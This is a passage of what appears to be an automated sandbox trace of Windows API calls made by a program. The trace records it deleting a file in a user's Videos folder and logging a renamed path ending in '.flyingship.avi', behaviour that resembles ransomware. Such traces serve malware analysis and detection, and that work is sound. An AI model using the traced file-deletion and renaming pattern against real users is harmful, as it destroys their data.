lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.254] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0197.254] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0197.254] FreeLibrary (hLibModule=0x75c90000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.264] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0197.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0197.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.264] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0197.264] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.264] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\9e bcelv9odp5iit.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0197.265] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.265] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0197.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.265] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.266] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.266] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0197.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.266] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.266] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.266] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", lpFilePart=0x0) returned 0x5b [0197.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0x1a7cb020, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 0x90af58 [0197.267] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\9e bcelv9odp5iit.avi")) returned 1 [0197.269] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0x1a7cb020, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 0 [0197.269] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.272] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.273] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.274] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.274] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0197.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.275] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0197.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0197.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.275] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0197.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.275] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.275] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.275] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0197.275] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.275] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0197.276] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x396d, lpOverlapped=0x0) returned 1 [0197.276] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0197.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x396d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0197.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi\r\n", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0197.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x69) returned 0x906f38 [0197.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi\r\n", cchWideChar=105, lpMultiByteStr=0x906f38, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 105 [0197.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0197.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0197.277] WriteFile (in: hFile=0x158, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x68, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x68, lpOverlapped=0x0) returned 1 [0197.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0197.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.277] CloseHandle (hObject=0x158) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0197.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0197.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.280] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0197.280] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.280] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0197.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0197.281] 